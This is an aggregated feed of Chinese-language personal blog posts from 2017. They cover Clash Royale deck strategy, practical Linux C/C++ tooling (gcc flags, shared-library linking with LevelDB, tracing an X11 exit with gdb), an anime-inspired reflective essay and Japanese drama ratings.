Planet ITRS

December 01, 2017

Clash Royal:3/0/10/12 (13) 打上4900大師聯盟賽1

七月的時候用 0/0/9/12 打上 4900,八月的時候攻城槌升到10又打上去一次。再之後變得更難打,大環境升牌的速度太快,九月三槍升10也打不上去,十月的時候小電升到12級、水罐9級,但更難打,到4600+ 野豬幾乎都配13級小電,可以秒掉12級哥布林大軍,非常難守。

這個月鐵了心將哥布林大軍升到13級,然後換另一套卡等略低,但更靈活的三槍槌,總算是又打到4900了,最後幾場滿多是處於劣勢再逆轉回來。

最後一場和倒數第二場的replay,當時是全神慣住,不斷地算牌和猜牌,兩場都成功地抓到空隙一波打進去,逆轉劣勢。

by fcamel (noreply@blogger.com) at December 01, 2017 02:08 PM

November 27, 2017

Clash Royale 挑戰賽 12 勝記錄

記錄一下玩過那些套路,以前用的都忘光了,應該有用過不少次石頭套。以下沒特別說明的話,都是經典挑戰賽。

刺客礦工低費三槍 (2017-11)

去掉攻城槌換成刺客,再配上兩費的刀哥和蝙蝠,不只進攻節奏快,轉水罐的速度也快。進攻沒什麼問題,不過我不太會守,滿常 1:0 後不知要怎麼打。然後被逆轉。有時應該不要搶節奏,穩下來出三槍才是,還不太會抓時機。

12勝的最後三場對手最高勝場分別是17勝、13勝、16勝,都是會打的對手。倒數第三場在對手下連弩前有察覺對手是冰法連弩,就沒有再種第二個水罐,不然就崩了。最後一場看到公主、豬、小皮後,發覺是帶火箭的小皮豬,水罐和三槍的位置就有留意,沒被火箭賺到。多留意近期的 meta 牌組,對於12勝大有幫助。

超騎地獄龍刺客毒礦 (2017-10)

最近比較常玩 Mario Kart 8 Deluxe, 就比較少玩這個。看到瘋蛙用這套滿有趣的,之前都沒練過毒礦消耗的牌組,拿來玩看看。第四次挑戰終於通關,分別是8:3, 10:3, 10:3, 12:1。

超騎和刀哥遇到野豬優勢很大,超騎也剋連弩或迫擊炮,還有毒礦滿剋現在流行的騎士桶,毒也剋這版的墓園,所以在現在的環境打很有優勢,基本盤有個一半吧。遇到同樣毒礦就五五波看熟練度,遇到巨人用地獄龍/刀哥/蝙蝙交錯守,配礦工反推對手很難守。

很怕氣球,對手有大亡靈也很難攻進去,過來也不好守。遇到一場新手有氣球和大亡靈,靠經驗優勢贏了; 一場遇到三槍槍大亡靈,我失誤太多輸了; 最後一場遇到18勝高手用超騎球,不過對方失誤太多,反而讓我贏了。

我不想等對手先出牌,所以能先出牌就出牌。起手最佳選擇是刺客沉底,再不然是刀哥或蝙蝠。有次小電過牌,對手來個天狗配地獄龍,就直接崩了。毒要用來解大皮後面的電法或墓園或大亡靈,不能隨便出。超騎費太高用來反打,礦工出完對方出水罐也很尷尬,所以起手選擇不多。不過反擊的時候可以礦工刺客同路或分路速攻,或是加上超騎或地獄龍當坦,進攻的組合效果很強。

巨人超騎電法幻刺重甲 (2017-08)

趁超騎挑戰賽剛拿到,快拿來玩一玩,雖說這次應該不會像暗巫那樣一下就被削弱了,先玩還是有些優勢。

這套是天梯前10裡抄來了,有陣子一堆人用這套。攻擊力很猛,拿超騎當巨人後排,或超騎自己當坦防守反擊都不錯。不過大多時候還是巨人當坦,後面跟 電法/重甲/幻刺 三選二,這樣比較划算。

遇到石頭/大皮劣勢,只能換路。遇到狗球也守不住,還是得換路。不過狗球也守不住這套,比遇到大皮好一些。必須巨人滿血,後面跟電法重甲,對手只有大皮,這時才有機會打進去。所以雖然超騎和電法都能守豬 (超騎還能無損解!),但遇到大皮豬還是劣勢。遇到其它組合的巨人都優勢,多數情況超騎下去,對方後排就全沒了。帶一堆空軍後排的巨人是五五波吧,有扣毒藥防守,對方也打不進來。對到其它陸軍組合都優勢 (速轉豬、攻城槌幻刺、毒礦),超騎下去全解掉,然後反打一波超賺、打不進去的時候就下水罐,對手還要下費解超騎,也很賺 。缺點大概是前五張沒巨人或水罐的話,很卡手,下什麼都是送費,只能等對手先出牌。

三槍攻城槍雪人礦工暗巫 (2017-08 傳奇挑戰賽)

前幾天看到亞洲盃亞軍水水用這套打鬥魚主播聯賽,用得超神的。想說用這套來打傳奇挑戰賽。雖然暗巫才在今天 (8/11) 被削弱,在前面有雪人或攻城槌當坦的情況下,還是不錯用。

用雪人暗巫守完可以反推一下,讓對手繼續消耗水費。水夠的情況加個攻城槌,撞塔機率滿高的,沒撞到配合後面的蝙蝠,殺傷力也滿可觀的,還可以適時補個礦工,攻擊的疊加效果很好。不出三槍也很有威力。只是雪人也是稀有卡,要集三張稀有太吃力了,暗巫礦工又是傳奇,不適合作為爬梯的牌組。

大皮飛斧旋風豬 (or攻城槌) (2017-07)

看到帽子一隻用這打終極挑戰賽,想說拿來練習看看。前半用豬,中途打 2vs2 將豬換成攻城槌 (我的豬8級、槌9級),懶得換回來就繼續用。偶而想到加減打個一兩場,沒想到在很早期輸兩場的情況打到12勝。

這套非常剋三槍攻城槌,大皮或飛斧旋風都可以無損解攻城槌和它後排 (單槍/雙槍/大亡靈/暗巫/刺客等)。大電可以隨意地用來電水罐或在雙倍聖水時輔助進攻。算是遇到各種套路都能應付的牌組,缺點是容易卡牌。手上是「三法術飛斧皮卡」五選四的組合都無法出手,手上有哥布林大軍的時候也不適合亂出,不然會被逼著拿飛斧去解牌,導致真的需要飛斧時沒有飛斧。沒有好牌出的時候要忍著不能亂出。

三槍攻城槌 (雪人刺客暗巫) (2017-06)

原本想練胖子卻一直輸 (也滿合理的啦),一怒之下乾脆打沒用過的三槍攻城槌套路,沒想到竟然12勝0敗。這副是之前打終極挑戰賽遇到的,很剋上一副大皮攻城槌 (雪人暗巫可以擋下攻城槌後面跟吹箭,然後反打一波。加補哥布林大軍就加補小電,讓上套沒有打進來的機會。賺費加下水罐,然後分槍進攻)。在暗巫削弱一陣子後,這副才興起。

感覺我大概離不開三槍攻城槌了,完全抓不到用胖子的節奏...

大皮攻城槌 (火龍旋風吹箭哥布林) (2017-06)

用三槍攻城槌玩終極挑戰一直遇到這套然後被虐,索性也來玩這套看看。果真遇到三槍滿有優勢的。攻城槌打地獄塔可以賺費,又幫大皮消耗對方的地獄塔,兩者因此滿常組在一起。吹箭哥布林則是最近才流行起來,也許是因為滾木削弱了,使用性就變高了吧?用攻城槌火龍進攻後,視情況後排補上吹箭哥布林,前面有殘血的火龍擋著,可以打山滿高的傷害。

三槍攻城槌 (電法+小骷髏+哥布林大軍) (2017-06)

前陣子練其它套輸太慘,改玩比較熟的組合重拾一下信心 Orz。這版小骷髏和哥布林大軍都被削弱了,不過這組合的防守核心在電法,感覺不到整體強度有變差。三槍攻城槌的基本組合下,配套大概就小骷髏、哥布林大軍、電法、亡靈大軍四選三,效果都不錯。

大皮與他的傳奇夥伴 (2017-06)

之前好像沒有用大皮12勝過?配上強大的傳奇夥伴們,加上沒有遇到毒墓,碰巧12勝啦。最後一場打得超緊張的 ,打得還算精彩。Btw, 最近打皇胖和大皮的感想是:這類高費的核心牌沒有到雙倍聖水時間不能出,不然容易費用轉不過來,牌序也調不回來,直接崩了。之前玩三槍和石頭也有這樣的感覺,不知道天狗是否也是如此。

皇胖+礦工公主小電+飛斧龍捲風+雪人 (2017-06)

皇胖真是張尷尷的牌,要坦不坦,要快不快,打挑戰賽相當弱勢。趁著現在暗巫OP,想說能不能用暗巫助皇胖拿個十二勝。試了許多組合,只能打到 8 ~ 10 勝左右。試過的幾中幾組如下:

  • 電法小骷髏雪精靈+大小電+飛斧龍捲風。
  • 鏡像暗巫+飛斧龍捲風+礦工小電+小骷髏

一堆 OP 組合加上皇胖還是不行,雖說我技術也不夠好啦。最後用這套通關。若其它套通過的運氣成份占50%的話,這次運氣應該占了70%以上,有遇到強勢的鏡像複製女巫 (剛好被我這套剋),但完全沒遇到毒墓。雖然我有針對毒墓和狗球配防守牌,但沒遇到還是比較好。

鏡像暗巫、公主、攻城槌 (2017-06)

打起來滿無腦的,而且很容易三冠 (六場三冠)。鏡子幾乎都用在暗巫身上,少數用在攻城槌、公主、哥布林大軍。對手下水罐就攻城槌+礦工+小電進攻兼破水罐,對手不攻就沉底公主、暗巫,手上沒公主暗巫就攻城槌意思意思進攻一下,然後再沉底暗巫解掉。盡可能在有鏡子的時候再下暗巫,然後不用急著打一波,費滿沉底再下更高等的暗巫。對手硬是不攻就橋頭補攻城槌。整體上不急著進攻,以調整牌序,不斷刷暗巫、鏡像暗巫為主,有機會再衝一波。

毒墓 (火龍、飛斧、龍捲風、騎士、暗巫、電法) (2017-06)

暗巫出來後最OP的套路吧,吃死狗球、豬、粉絲套,對上其它暗巫牌組也有滿高的勝算,像是吃死鏡像複製暗巫。遇到這套打得很火,乾脆自己用一下,看看有無弱點。結果一試就12勝,只輸一場,但是是自己連續失誤輸給飛斧墓園。

複製骷膢巨人 (2017-06)

ptt 看來的,超歡樂的牌。參考原 po 說的替換選擇,試打幾場後,用這個組合在 4:2 後強運地連 8 險勝。打完手超抖的。

攻城槌毒墓五傳奇 (2017-05, 06)

買了刺客,想同時玩暗巫和刺客,加上我滿喜歡礦工攻城槌的套路,全湊在一起就變五傳奇卡組了 XD。效果意外的好,進攻火力多元,對手很難守住全部進攻方式,直接換路 all in (all in 組合的選擇很多 XD) 或是防守反推攻城槌或墓園都 OK。不過我方防守也有許多問題,多數情況就換家。這個牌等打天梯在季末可以站穩 4100 吧,對到 12、13 等的牌也還有勝算。打 2 vs 2 部落戰也不錯,勝率很高。用這副和 TJ 用下副牌打部落戰有 5 連勝過。

Btw, 這套太好玩了,打了三次12勝 (第三次第10場不小心用到別的牌組)。

巨人暗巫 (2017-05)

用 500 寶石打暗巫選卡挑戰賽拿到暗巫後,看 ptt 有人說這套 (冰法換小骷髏) 勝率很高。試打後遇到對手有暗巫很容易輸,所以用冰法取代小骷髏,用來守暗巫。除了超 troll 的鏡像複製暗巫外,都還有勝算。

偶像套 (2017-03?~05?)

平均牌費最高的偶像套,打起來相當抒壓 XD,但要打到12勝還是要認真思考就是了。順風的話對手完全守不住,但水費略輸後,沒有小費牌賺費,不容易扳回來。

三槍攻城槌 (電法+雙一費) (2017-03?~05?)

看世界冠軍嗚聖用得超威,跟風玩看看。沒等差問題的話,電法配小骷髏、冰精靈真的很強。攻守都行,又能快速過牌,減輕牌序不順的問題。

三槍攻城槌 (2017-03?~05?)

這套半自創的,用攻城槌很久,覺得不太夠力。後來看到有人搭三槍,效果不錯,就組一個適合長期發展的套路,用來爬梯。

想測試牌組是否平衡,就打挑戰賽看看。用沒多久,差不多時間三槍攻城槌變熱門牌組,出現各種套路,這套自然也有人用。

by fcamel (noreply@blogger.com) at November 27, 2017 01:53 PM

November 22, 2017

November 17, 2017

September 03, 2017

讀出 gcc/g++ 編譯的參數

這裡看來的,官方文件說 -grecord-gcc-switches 預設有開,所以滿可靠的。

使用例子:


$ g++ f.cpp -std=c++11 -g -o f
$ readelf --debug-dump f | grep DW_AT_producer
DW_AT_producer : (indirect string, offset: 0xded): \
GNU C++11 5.4.0 20160609 -mtune=generic -march=x86-64 -g -std=c++11 -fstack-protector-strong
DW_AT_producer DW_FORM_strp

但用 clang 編的資訊就沒存完整:


$ clang++ f.cpp -std=c++11 -g -o f
$ readelf --debug-dump f | grep DW_AT_producer
DW_AT_producer : \
(indirect string, offset: 0x0): clang version 3.8.0-2ubuntu4 (tags/RELEASE_380/final)
DW_AT_producer DW_FORM_strp

by fcamel (noreply@blogger.com) at September 03, 2017 04:46 AM

July 02, 2017

Clash Royal:0/0/9/12 打上4900大師聯盟賽1

看到 PTT 網友用三槍豬騎士用 0/0/9/12 打上 4900,想說這個賽季或許有希望。試著用一樣的牌組 (豬換用攻城槌,所以是「三槍攻城槌騎士小骷髏冰精靈哥布林大軍」) 衝刺一下。打到差一場的時候被 10 級火球砸下來,然後一路崩。

後來改換這組搭冰精靈、哥布林大軍、大亡靈:

這樣對手火球砸雙槍的時候,可以用大亡靈反攻,讓對方不好下手 (雖說實戰時對手還是就砸下去了...)。

最後在騎士冰精靈也升到12後,總算爬上去了。雖然我比較喜歡用礦工,但是實戰覺得爬梯用騎士比礦工穩,一來騎士好升級,二來用騎士比較容易組織一波完整的進攻,礦工則是搶時機,有機會奇襲,但防守力道弱,也不方便防守反擊。

最後一次衝刺特地睡飽養足精神再打,保持在最佳狀況。這遊戲狀況好和狀況差,表現差超多。狀況差的時候會忘了記對手牌序、水費算錯,或是沒思考要怎麼組織進攻或如何有效率地防守。得全神慣注地玩才能抗等差險勝。然後運氣和系統想不想惡搞你,也影響很多

最後一勝的影片,先處於劽勢再反打一波:

對戰記錄:

如此一來,差終極挑戰12勝,這遊戲就沒遺憾啦。目前用這套在狀況好的時候可以打到10勝 (滿多是險勝),最後就有點沒力,然後連崩。

by fcamel (noreply@blogger.com) at July 02, 2017 05:56 AM

June 17, 2017

June 01, 2017

May 30, 2017

Clash Royale 11等牌上 4600 杯

沒想到這遊戲打超過一年了,再之前玩了一年多的 COC 則是沒在玩了 (結婚後沒多久開始玩 COC)。

牌等通膨超嚴重的,去年 3000 杯還有六等稀有卡,有種青春懷念的感覺。現在大家以 4000 杯為基線,12牌等滿天飛,13等皇家巨人和精銳野蠻人也不算少。用11等牌打上 4600,也算值得紀念一下的事。

Btw, 三槍9等後滿順利的上4300,相當有感。攻城槌9等後,則是趁著季末比較輕鬆的時候上4600,主力卡升一級滿有感的。

by fcamel (noreply@blogger.com) at May 30, 2017 02:08 PM

May 13, 2017

April 29, 2017

在 Linux 下開發 C/C++ 的新手指南

新加入一個專案,最先面對的課題是如何正確地編譯和執行專案,可從 "It works on my machine" 如此地風行,印證這件事的困難性;再來則是閱讀負責工作相關的程式碼。至於發揮程式語言的特性,運用高階設計模式等,都是另開新專案或熟悉狀況後才有機會發揮。

過去數年沉浸在愉快的 scripting language 和開發新專案中,一直沒踏入這殘酷的世界。這篇記錄在這樣的情境下,可能需要的技能,結算一下這一個多月的心得,全都是血淚談啊 ...。

系統工具

熟悉作業系統的安裝套件是首要之務,這樣才知道如何補足需要的 header、library,或是安裝含 debug symbol 版的函式庫以執行 gdb 觀察程式或除錯。參見《自行編譯含 debug symbol 的套件 (package)》了解 Ubuntu/Debian 下的套件命名規則。

在未安裝套件的情況下,可用

  • aptitude search SUBSTRING # 找套件
  • aptitude show PACKAGE # 顯示套件用途
  • apt-file search X # 找出 X 包在那個套件裡,找 header 時很有用。

注意在用 apt-file 前要先跑 sudo apt-file update,不然搜不出東西來。

對於已安裝套件,可用

  • dpkg --search SUBSTRING # 找出安裝在那個套件,已知 header 時,適合用來找 library
  • dpkg -L PACKAGE # 列出套件內容,可用來找 header、library
  • locate SUBSTRING # 我比較常用它找 header 的位置,再觀看 header 內容

執行 locate 前記得先執行 sudo updatedb,原因同 apt-file。

《除錯技巧:在 Ubuntu 上找出第三方函式庫的程式碼》用一個小例子說明如何使用這些工具找出原始碼協助除錯。

其它參考資料: How To Manage Packages Using apt-get, apt-cache, apt-file and dpkg Commands ( With 13 Practical Examples )

編譯

連結

這一塊讓我卡了一陣子。一些粗淺心得:

執行

光只是讀程式碼就像大海撈針一樣,不太有效率。可從動態執行過程找出主要執行的路徑,再專注相關的程式碼。

1. strace 和 ltrace

srace 是分析執行行為的強大工具,google 一下會看到很多別人的個案心得,看看再自己試一試,很快能上手,不知能發揮它多少功能。這裡列自己用的兩個小案例:

反而是 ltrace 一直都想不到使用它的時機,也沒找到好的個案心得文。

2. gdb

gdb 的重要性不需多說明,之前的幾則心得:

強烈建議使用 cgdb,簡易安裝 + 無痛上手,瞬間省下大量操作和讀碼的時間。

3. 打開除錯功能

依照開發者的習性,一定會留後門讓自己方便除錯,從這角度下手也可省下不少時間:

4. 載入函式庫

除以上所言外,我另外有找過畫出程式流程的靜態和動態分析工具,像是畫 call graph 或是 C 的 cflow。不過 C++ 的靜態分析效果很糟,就沒花太多時間研究。目前用 strace 和 gdb 覺得已夠用了,不知用工具產生 call graph、class 相依圖或其它東西,是否會更有幫助。待有需求看整體的程式時再來試試。

閱讀程式碼

聽了大家的建議後,做了一些實際操作,而有些心得:

Eclipse CDT 雖然方便,後來我還是用 gj 居多。原因有幾點:

  • 我已很習慣用 vim + screen 做事,gj 最合這個情境
  • id-utils 真的是超級快
  • 我針對自己的需求更新 gj 多次,愈用愈順手

另外 ack 也滿方便的,懶得建 index 或是想比對子字串時,可直接使用。當然 id-utils 也支援子字串比對,只是暫時懶得為此修改 gj 的程式,目前大部份需求是找完整的 symbol。

熟悉 Linux 系統程式

在基本工具都上手後,打算每天抽一點時間加減讀一點相關知識。一兩年下來應該會有不錯的成果。目前打算讀《The Linux Programming Interface》,年假時試看看效果如何。

這一個月的心得以了解 /proc 為主,對觀察 CPU 用量、RAM 用量、載入那些函式庫、multi-thread、程式執行狀態等都很有幫助:

結論

即使大概知道有那些東西,還是需要實際動手的經驗,才會真的學進去。一個月下來進步了不少,不過對於要面對的戰役,還有一大段路要趕上,還有很多很多要學的。

2012-01-29 更新

補上一些後來新寫的連結。此外,《The Linux Programming Interface》 相當實用,讀 ch1 ~ 3 讓我補足不少基礎知識。ch41、42 講解 shared library 也相當值得一看。相關心得見《The Linux Programming Interface 讀書心得》

2013-07-13 更新

備忘效能分析相關的工具:

出處:Linux Performance Analysis and Tools

2013-07-20 更新

將後半部份內容抽出來,另寫了一篇比較完整的文章:《了解 C/C++ 程式行為的技巧》。

by fcamel (noreply@blogger.com) at April 29, 2017 05:00 PM

(C/C++ ) 如何在 Linux 上使用自行編譯的第三方函式庫

以使用 LevelDB 為例。

抓好並編好相關檔案,編譯方式見第三方函式庫附的說明:

$ ls include/  # header files
leveldb/
$ ls out-shared/libleveldb.so* # shared library
out-shared/libleveldb.so@ out-shared/libleveldb.so.1@ out-shared/libleveldb.so.1.20*

下面的例子用 clang++ 編譯,這裡用到的參數和 g++ 一樣。

問題一:找不到 header

$ clang++ sample.cpp
sample.cpp:5:10: fatal error: 'leveldb/db.h' file not found
#include "leveldb/db.h"
^
1 error generated.

解法:用 -I 指定 header 位置

問題二:找不到 shared library

$ clang++ sample.cpp -I include/
/tmp/sample-2e7dd8.o: In function `main':
sample.cpp:(.text+0x1e): undefined reference to `leveldb::Options::Options()'
sample.cpp:(.text+0x6f): undefined reference to `leveldb::DB::Open(leveldb::Options const&, std::string const&, leveldb::DB**)'
sample.cpp:(.text+0x10c): undefined reference to `leveldb::Status::ToString() const'
sample.cpp:(.text+0x7d0): undefined reference to `leveldb::Status::ToString() const'
clang: error: linker command failed with exit code 1 (use -v to see invocation)

要求 linker 連結 libleveldb.so (linker 的參數由 clang++ / g++ 轉傳):

$ clang++ sample.cpp -I include/ -l leveldb
/usr/bin/ld: cannot find -lleveldb
clang: error: linker command failed with exit code 1 (use -v to see invocation)

但 compiler 說找不到要連結的 library

補上 libleveldb 的位置:

$ clang++ sample.cpp -I include/ -l leveldb -L out-shared/

問題三:執行時找不到 shared library

$ ./a.out
./a.out: error while loading shared libraries: libleveldb.so.1: cannot open shared object file: No such file or directory

編出 executable file 或 shared library 表示 static linker 成功,但執行時會用到 dynamic linker 載入函式庫。這錯誤訊息是dynamic linker 回報的。

用 ldd 可以檢查 shared library 的路徑是否正確:

$ ldd a.out | grep leveldb
libleveldb.so.1 => not found

幾種解法:

1. 用 LD_LIBRARY_PATH 指定位置 (man ld.so 查看細節)

$ LD_LIBRARY_PATH=`pwd`/out-shared ./a.out

若 out-shared 的位置有固定的話,可以在 /.bashrc 加上

export LD_LIBRARY_PATH=/path/to/out-shared 

2. 將 library path 寫到 executable 裡 (man ld.sh 查看細節):

$ clang++ sample.cpp -I include/ -l leveldb -L out-shared/ -Wl,-rpath,`pwd`/out-shared 
$ objdump -p a.out | grep PATH # 確認有記錄
RPATH /home/fcamel/dev/study/leveldb/out-shared
$ ldd a.out | grep leveldb # 也可用 ldd 確認
libleveldb.so.1 => /home/fcamel/dev/study/leveldb/out-shared/libleveldb.so.1 (0x00007fc1f091e000)

這裡我用絕對路徑減少潛在的問題。

3. 搬到系統函式庫

$ ldd a.out  | grep leveldb
libleveldb.so.1 => not found
$ sudo su
$ cp out-shared/libleveldb.so* /usr/lib
$ ldd a.out | grep leveldb
libleveldb.so.1 => /usr/lib/libleveldb.so.1 (0x00007f1717026000)

但這樣和系統內建的混在一起,不好維護。改放到 /usr/local/lib/leveldb/ 下:

$ mkdir /usr/local/lib/leveldb
$ cp --preserve=links out-shared/libleveldb.so* /usr/local/lib/leveldb/
$ echo "/usr/local/lib/leveldb" > /etc/ld.so.conf.d/leveldb.conf
$ ldconfig # Update ldconfig's cache
$ ldd a.out | grep leveldb
libleveldb.so.1 => /usr/local/lib/leveldb/libleveldb.so.1 (0x00007f0314b32000)

由 man ldconfig 得知 ldconfig 會讀 /etc/ld.so.conf。我在 Ubuntu 14.04 看到的設定如下:

$ cat /etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

所以在 /etc/ld.so.conf.d/ 建新檔案寫入 /usr/local/lib/leveldb,然後更新 ldconfig cache 即可。

參考資料

  1. The Linux Programming Interface ch41: Fundamentals of Shared Libraries
  2. man ld.so
  3. man ldconfig

by fcamel (noreply@blogger.com) at April 29, 2017 04:16 PM

March 15, 2017

2006-10-25 無題

最近重看《蜂蜜與四葉草》, 想起以前寫的雜感。原始文章不見了, 幸好有能從 Web Archive 找回來。重記在這裡。


蜂蜜與四葉草(Honey & Clover)是我很喜歡的一部動畫,我特別喜愛竹本忽然踏上自行車開始的尋找自我之旅,然而,對竹本而言,他只是想知道「一路這樣騎下去,到底能騎到那裡?」。如同沒有預期的開始,答案不存在的旅行也在沒有預期之下結束,心境轉換只在一瞬,竹本的迷惘、竹本的衝勁、竹本的成長,讓我立即想踏上自行車朝一個方向騎去,重看數次依然如此,只是我仍在原地。

一直騎到你覺得足夠為止。答案是什麼都好,也許答案根本不存在,一切都只不過是「自己真的盡情做過了嗎?」而已

途中,大師傅對竹本這麼說。

我總是過於慎重看待每件事,失去放手一摶的衝勁,就在不斷的考慮之中,漸漸喪失放手一摶的資格。我只能羨慕敢衝的朋友,羨慕有熱情朝目標直直邁進的朋友。做研究上,我知道我對一些事很有興趣,但是大學拖了四年,我對它們的了解卻沒長進多少,期待著碩士是個開始,一個深入的機會,也是最後的機會。

路邊休息的竹本,看到飛馳而過的列車--北斗星,竹本憶起童年往事,追著北斗星,直直的向前,回神過來時,人已浮在空中,爽快的飛出坡道。

看過灰藍色海。看過橫過道路的雲的影子。踩單車、吃飯、睡覺,睡醒了又繼續踩...

於是,竹本見到了雨盡的地方,見到一片光亮的盡頭。

這陣子研究的題目是改善交通阻塞,題目愈來愈明確,但我沒仍然沒感受到對這題目的熱情,反而在玩web時對Information Retrieval (IR)產生興趣,我不知道是否又是一次逃避,逃避深入專研一件事的麻煩,畢竟我不曾全心全意深入一個問題過,我再度陷入迷惘,是先完成已投入部份時間並有明確方向的題目,還是跳入一無所知,只對關鍵字產生興趣的領域?

一直沒有察覺...自己的房門竟然是...一道「任意門」。只要打開門走出去,就能到達任何地方。 ... 簡直就像傻瓜似的。這種事連小學生也懂。其實我自己也懂,但是...在沒來到這裡以前...我弄不清楚而已。

或許,不再是或許,現在就是放手一摶的時刻。

by fcamel (noreply@blogger.com) at March 15, 2017 04:42 PM

March 10, 2017

fcamel 說 好久沒用 plurk, 用 Apple trackpad 滾河道不太順, 速度過快

fcamel 說 好久沒用 plurk, 用 Apple trackpad 滾河道不太順, 速度過快

by fcamel at March 10, 2017 04:19 PM

fcamel 說 如何從 C/C++ 函式名稱找出來源檔案和行數? – fcamel – Medium

by fcamel at March 10, 2017 04:18 PM

March 08, 2017

除錯技巧:在 Ubuntu 上找出第三方函式庫的程式碼

這篇藉由一個小例子說明如何使用 gdb, locate, apt-file, apt-get 找出問題原因。藉由取得第三方函式庫的程式碼,可以減少瞎猜的時間。

問題

我發現某個程式會不預期的結束。但它不是 crash,沒有 core dump 可看。

用 gdb 找出怎麼結束的

先用 gdb attach 程式,繼續操作。程式結束時 gdb 顯示是呼叫 exit() 結束的。

於是再執行一次,這次用 gdb 在 exit 設中斷點再繼續執行。

取得的 backtrace 如下:

#0  __GI_exit (...) at exit.c:104
#1 0x00007fdd27f60408 in _XDefaultError (...) at ../../src/XlibInt.c:1414
#2 0x00007fdd27f6054b in _XError (...) at ../../src/XlibInt.c:1463
#3 0x00007fdd27f5d5e7 in handle_error ...) at ../../src/xcb_io.c:213
#4 0x00007fdd27f5e687 in _XReply (...) at ../../src/xcb_io.c:699
#5 0x00007fdd27f45346 in XGetWindowProperty (...) at ../../src/GetProp.c:69
#6 0x00007fdd2825db30 in XmuClientWindow () from /usr/lib/x86_64-linux-gnu/libXmu.so.6
...

看 backtrace 沒什麼頭緒,都是第三方函式庫的程式。照 XmuClientWindow() 的說明,它可能會失敗,但它不該直接呼叫 exit()。先找 XmuClientWindow 的原始碼,看看有什麼線索。

用 Ubuntu 的 package 系統找出原始碼

首先用 apt-file 找出 libXmu.so.6 在那個套件 (第一次執行需先跑 apt-file update 更新索引):

$ apt-file search /usr/lib/x86_64-linux-gnu/libXmu.so.6
libxmu6: /usr/lib/x86_64-linux-gnu/libXmu.so.6
libxmu6: /usr/lib/x86_64-linux-gnu/libXmu.so.6.2.0
libxmu6-dbg: /usr/lib/debug/usr/lib/x86_64-linux-gnu/libXmu.so.6.2.0

然後用 apt-get source 取得原始碼:

$ apt-get source libxmu6

在 src/ClientWin.c 裡找到 XmuClientWindow [*1]:

Window
XmuClientWindow(Display *dpy, Window win)
{
...
XGetWindowProperty(dpy, win, WM_STATE, 0, 0, False, AnyPropertyType,
&type, &format, &nitems, &after, &data);
....
}

沒什麼有用資訊,繼續找 XGetWindowProperty 的程式碼。從 backtrace 裡知道它在 ../../src/GetProp.c 裡,但我不知道 GetProp.c 是什麼套件的程式。用 Google 搜尋 GetProp.c 也許會有線索,不過這裡我用另一個作法。

從 header 找出原始碼

src/ClientWin.c 引入的 header 不多,只有這些:

#include <X11/Xlib.h>
#include <X11/Xatom.h>

#include <X11/Xmu/WinUtil.h>

先用 locate 查出完整路徑:

$ locate X11/Xlib.h
/usr/include/X11/Xlib.h

再用 apt-file 找套件名稱:

$ apt-file search /usr/include/X11/Xlib.h
libx11-dev: /usr/include/X11/Xlib.h

取得原始碼:

$ apt-get source libx11-dev

附帶一提,可透過 gcc -E 展開 #include 驗證 XGetWindowProperty 確實出自 X11/Xlib.h:

$ echo "#include Xlib.h>" | gcc - -E | grep XGetWindowProperty
>extern int XGetWindowProperty(

header 太多的話,直接編譯原始檔比較快:

$ gcc -E src/ClientWin.c > t
得到的資訊如下:

1674 # 1303 "/usr/include/X11/Xlib.h" 3 4
...
3060 extern int XGetWindowProperty(

找到目標後,往回找第一個 header 路徑就是來源了。如果找不到的話,可能是少指定 include header 的來源目錄。可以從 make 產生的結果得知完整的編譯訊息:


$ ./configure
$ make V=1 | grep ClientWin.c
/bin/bash ../libtool --tag=CC --mode=compile gcc -std=gnu99 -DHAVE_CONFIG_H \
-I. -I.. -I../include -I../include/X11/Xmu < ... 略 ...> -c -o ClientWin.lo ClientWin.c
...

找出 -I 的部份,和 -E 一樣加在 gcc 的參數上展開 include。

關於如何讓 make 顯示編譯時的參數 (cflags),參見這裡

繼續追踪程式碼

在 src/GetProp.c 裡發現:

 69     if (!_XReply (dpy, (xReply *) &reply, 0, xFalse)) {

這和前面的 backtrace 一致:

#0  __GI_exit (...) at exit.c:104
#1 0x00007fdd27f60408 in _XDefaultError (...) at ../../src/XlibInt.c:1414
#2 0x00007fdd27f6054b in _XError (...) at ../../src/XlibInt.c:1463
#3 0x00007fdd27f5d5e7 in handle_error ...) at ../../src/xcb_io.c:213
#4 0x00007fdd27f5e687 in _XReply (...) at ../../src/xcb_io.c:699
#5 0x00007fdd27f45346 in XGetWindowProperty (...) at ../../src/GetProp.c:69
#6 0x00007fdd2825db30 in XmuClientWindow () from /usr/lib/x86_64-linux-gnu/libXmu.so.6

表示尋找的方向正確。再繼續看 src/xcb_io.c 和 src/XlibInt.c 內相關函式,得知:

// src/XlibInt.c
1463 rtn_val = (*_XErrorFunction)(dpy, (XErrorEvent *)&event); /* upcall */

對照 backtrace 得知執行 _XErrorFunction 後,是呼叫 _XDefaultError。_XDefaultError 程式如下:

1409 int _XDefaultError(
1410 Display *dpy,
1411 XErrorEvent *event)
1412 {
1413 if (_XPrintDefaultError (dpy, event, stderr) == 0) return 0;
1414 exit(1);
1415 /*NOTREACHED*/
1416 }

確認是這裡呼叫 exit()。所以換掉 _XErrorFunction 可以解決問題。

在程式碼裡搜尋 _XErrorFunction 發現可用 XSetErrorHandler() 設值。這樣至少不會造成程式結束了。

備註

1. 可用 grep 尋找,我是用 gj,找起來更有效率。

by fcamel (noreply@blogger.com) at March 08, 2017 02:01 AM

February 24, 2017

本週的運動便當

趁菜色還沒變差的時候,多留些紀念照 ...

by fcamel (noreply@blogger.com) at February 24, 2017 04:42 PM

January 27, 2017

新垣結衣×野木亞紀子

因為月薪嬌妻的關係,看了一系列新垣結衣的日劇。大致看了以下幾部 (有些只有跳著看其中幾集),括號內是個人喜歡程度:

  • 掟上今日子的備忘錄 (8分)
  • 月薪嬌妻 (7分)
  • 飛翔公關室 (7分)
  • 王牌大律師 (7分)
  • 王牌大律師 SP (7分)
  • Code Blue (6分)
  • 父女七日變 (6分)
  • My Boss, My Hero (6分)

最近三部月薪嬌妻、掟上今日子的備忘錄、飛翔公關室都是主演,編劇都是野木亞紀子,感覺這對組合挺不錯的。特別是掟上今日子的備忘錄,那天應該還會再看一次吧。對照原作覺得編劇真的改得很好,特別是加上咖啡廳三人組的設定,人物間的互動豐富了許多。原作還沒完結,日劇只能大致收個尾。沒看到故事完全結束,內心有點小糾結啊。

演技部份,覺得父女七日變、月薪嬌妻、掟上今日子的備忘錄演得最好,王牌大律師耍笨的部份滿不錯的,其它部份還好。

